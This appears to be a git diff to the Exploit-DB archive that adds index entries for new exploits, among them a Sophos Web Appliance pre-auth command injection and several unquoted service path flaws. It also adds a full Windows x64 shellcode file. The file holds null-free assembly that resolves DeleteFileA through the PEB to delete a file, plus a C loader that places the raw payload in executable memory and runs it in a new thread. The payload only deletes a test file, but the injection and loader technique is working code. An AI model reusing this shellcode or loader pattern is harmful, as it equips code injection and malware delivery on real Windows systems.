4480,exploits/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,webapps,php,,2007-10-01,,1,OSVDB-39897;CVE-2007-5261;OSVDB-39896,,,,,
5166,exploits/php/webapps/5166.html,"MultiCart 2.0 - 'productdetails.php' SQL Injection",2008-02-20,t0pP8uZz,webapps,php,,2008-02-19,2016-11-14,1,OSVDB-41942;CVE-2008-0911,,,,,
16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",2011-01-29,R3VAN_BASTARD,webapps,php,,2011-01-29,2011-01-29,1,,,,,,http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt
@@ -29793,6 +29797,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41413,exploits/php/webapps/41413.rb,"Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)",2016-12-12,xort,webapps,php,,2017-02-21,2017-07-18,1,CVE-2016-9553,,,,,
40725,exploits/php/webapps/40725.txt,"Sophos Web Appliance 4.2.1.3 - Remote Code Execution",2016-11-07,KoreLogic,webapps,php,,2016-11-07,2016-11-07,1,,,,,,
42012,exploits/php/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,webapps,php,,2017-05-16,2017-07-18,1,CVE-2017-6412,,,,,
+51396,exploits/php/webapps/51396.sh,"Sophos Web Appliance 4.3.10.4 - Pre-auth command injection",2023-04-25,"Behnam Abasi Vanda",webapps,php,,2023-04-25,2023-04-25,0,CVE-2023-1671,,,,,
48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.comsoplanning-1-45.zip,
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
@@ -39160,6 +39165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8782,exploits/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Local Privilege Escalation",2009-05-26,"NT Internals",local,windows,,2009-05-25,,1,OSVDB-54775;CVE-2009-1824,,2009-PsDrv_Exp.zip,,,
12261,exploits/windows/local/12261.rb,"Archive Searcher - '.zip' Local Stack Overflow",2010-04-16,Lincoln,local,windows,,2010-04-15,,1,OSVDB-63810,,,http://www.exploit-db.com/screenshots/misc/screen-shot-2011-01-09-at-50312-pm.png,http://www.exploit-db.comas_2_1.zip,
40335,exploits/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,local,windows,,2016-09-05,2016-09-05,1,,,,,,
+51393,exploits/windows/local/51393.txt,"Arcsoft PhotoStudio 6.0.0.172 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",2021-09-06,"Salman Asad",local,windows,,2021-09-06,2022-08-01,0,,,,,http://www.exploit-db.comDVR_stp.exe,
50130,exploits/windows/local/50130.py,"Argus Surveillance DVR 4.0 - Weak Password Encryption",2021-07-16,"Salman Asad",local,windows,,2021-07-16,2022-08-01,1,,,,,http://www.exploit-db.comDVR_stp.exe,
44169,exploits/windows/local/44169.txt,"Armadito Antivirus 0.12.7.2 - Detection Bypass",2018-02-22,"Souhail Hammou",local,windows,,2018-02-22,2018-02-22,0,CVE-2018-7289,,,,,
@@ -40784,6 +40790,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,,2019-06-07,2022-11-04,0,CVE-2019‑5678,,,,,https://github.com/RhinoSecurityLabs/CVEs/blob/0e318a283b00cf42ceb8b898e756deb62082c3aa/CVE-2019-5678/CVE%E2%80%912019%E2%80%915678.html
38792,exploits/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",local,windows,,2015-11-23,2015-11-23,1,CVE-2015-7865;OSVDB-130456,,,,,https://code.google.com/p/google-security-research/issues/detail?id=515
48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,,2020-04-28,2020-04-28,0,,,,,,
+51389,exploits/windows/local/51389.txt,"OCS Inventory NG 2.3.0.0 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,,
49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,,2021-05-11,2021-05-11,0,,,,,,
49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,,2020-11-09,2020-11-09,0,,,,,,
388,exploits/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",local,windows,,2004-08-09,2016-10-27,1,OSVDB-8408;CVE-2004-0733,,,,http://www.exploit-db.comodbg110.zip,
@@ -41491,6 +41498,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50912,exploits/windows/local/50912.py,"Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)",2022-05-11,"Netanel Cohen",local,windows,,2022-05-11,2022-06-27,1,CVE-2021-44595,,,,,
49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,,2020-11-25,2020-11-25,0,,,,,,
50757,exploits/windows/local/50757.txt,"Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,,
+51395,exploits/windows/local/51395.txt,"Wondershare Filmora 12.2.9.2233 - Unquoted Service Path",2023-04-25,msd0pe,local,windows,,2023-04-25,2023-04-25,0,,,,,,
50787,exploits/windows/local/50787.txt,"Wondershare MirrorGo 2.0.11.346 - Insecure File Permissions",2022-02-24,"Luis Martínez",local,windows,,2022-02-24,2022-02-24,0,,,,,,
50756,exploits/windows/local/50756.txt,"Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path",2022-02-18,"Luis Martínez",local,windows,,2022-02-18,2022-02-18,0,,,,,,
40535,exploits/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",local,windows,,2016-10-17,2016-10-17,0,,,,,http://www.exploit-db.compdfelement_setup_full1042.exe,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 0a5dc19e4..ba383d280 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -930,6 +930,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,,windows,238,2010-06-10,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-648.php
14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,,windows,195,2010-06-25,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-662.php
15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
+51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php
diff --git a/shellcodes/windows/51390.asm b/shellcodes/windows/51390.asm
new file mode 100644
index 000000000..e9beb414b
--- /dev/null
+++ b/shellcodes/windows/51390.asm
@@ -0,0 +1,146 @@
+; Name: Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode
+; Author: Nayani
+; Date: 22/04/2023
+; Tested on: Microsoft Windows [Version 10.0.22621 Build 22621]
+
+
+; Description:
+
+; This an implementation of DeleteFileA Windows api to delete a file in the C:/Windows/Temp/ directory.
+; To test this code create a file:
+; echo "test" >> C:/Windows/Temp/test.txt
+; and then execute the shellcode
+; This code uses PEB to resolve kernel32 and find the DeleteFileA function.
+
+
+
+
+
+
+
+sub rsp, 28h
+and rsp, 0fffffffffffffff0h
+
+xor rdi, rdi
+mul rdi
+mov r9, gs:[rax+0x60]
+mov r9, [r9+0x18]
+mov r9, [r9+0x20]
+mov r9, [r9]
+mov r9, [r9]
+mov r9, [r9+0x20]
+mov r8, r9
+
+; Get kernel32.dll ExportTable Address
+mov r9d, [r9+0x3C]
+add r9, r8
+xor rcx, rcx
+add cx, 0x88ff
+shr rcx, 0x8
+mov edx, [r9+rcx]
+add rdx, r8
+
+; Get &AddressTable from Kernel32.dll ExportTable
+xor r10, r10
+mov r10d, [rdx+0x1C]
+add r10, r8
+
+; Get &NamePointerTable from Kernel32.dll ExportTable
+xor r11, r11
+mov r11d, [rdx+0x20]
+add r11, r8
+
+; Get &OrdinalTable from Kernel32.dll ExportTable
+xor r12, r12
+mov r12d, [rdx+0x24]
+add r12, r8
+
+jmp short name_api
+
+
+getaddr:
+pop r9
+pop rcx
+xor rax, rax
+mov rdx, rsp
+push rcx
+check_loop:
+mov rcx, [rsp]
+xor rdi,rdi
+mov edi, [r11+rax*4]
+add rdi, r8
+mov rsi, rdx
+repe cmpsb
+je resolver
+incloop:
+inc rax
+jmp short check_loop
+
+
+resolver:
+pop rcx
+mov ax, [r12+rax*2]
+mov eax, [r10+rax*4]
+add rax, r8
+push r9
+ret
+
+name_api:
+
+; DeleteFileA
+
+xor rcx, rcx
+add cl, 0xC
+mov rax, 0x41656CFFFFFFFFFF ;leA
+shr rax, 40
+push rax
+mov rax, 0x69466574656C6544 ;DeleteFi
+push rax
+push rcx
+call getaddr
+mov r14, rax
+
+; Bool DeleteFileA(
+; LPCSTR lpFileName
+; );
+
+xor rcx, rcx
+mul rcx
+push rax
+
+mov rax, 0x7478742E74736574
+push rax
+mov rax, 0x2F706D65542F7377 ; ws/temp
+push rax
+mov rax, 0x6F646E69572F3A43 ; c:/Windo
+push rax ; RSP = "test.txt"
+mov rcx, rsp ; RCX = "test.txt"
+sub rsp, 0x20
+call r14 ;Delete File in C:/Windows/Temp/test.txt
+add rsp, 0x20
+
+
+[!]===================================== POC ========================================= [!]
+
+#include
+
+
+void main() {
+
+ void* exec;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+
+ unsigned char payload[] = "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xff\x48\xf7\xe7\x65\x4c\x8b\x48\x60\x4d\x8b\x49\x18\x4d\x8b\x49\x20\x4d\x8b\x09\x4d\x8b\x09\x4d\x8b\x49\x20\x4d\x89\xc8\x45\x8b\x49\x3c\x4d\x01\xc1\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x41\x8b\x14\x09\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x34\x41\x59\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04\x82\x4c\x01\xc0\x41\x51\xc3\x48\x31\xc9\x80\xc1\x0c\x48\xb8\xff\xff\xff\xff\xff\x6c\x65\x41\x48\xc1\xe8\x28\x50\x48\xb8\x44\x65\x6c\x65\x74\x65\x46\x69\x50\x51\xe8\xa6\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x74\x65\x73\x74\x2e\x74\x78\x74\x50\x48\xb8\x77\x73\x2f\x54\x65\x6d\x70\x2f\x50\x48\xb8\x43\x3a\x2f\x57\x69\x6e\x64\x6f\x50\x48\x89\xe1\x48\x83\xec\x20\x41\xff\xd6\x48\x83\xc4\x20";
+
+
+ unsigned int payload_len = 500;
+ exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ RtlMoveMemory(exec, payload, payload_len);
+ rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+
+}
\ No newline at end of file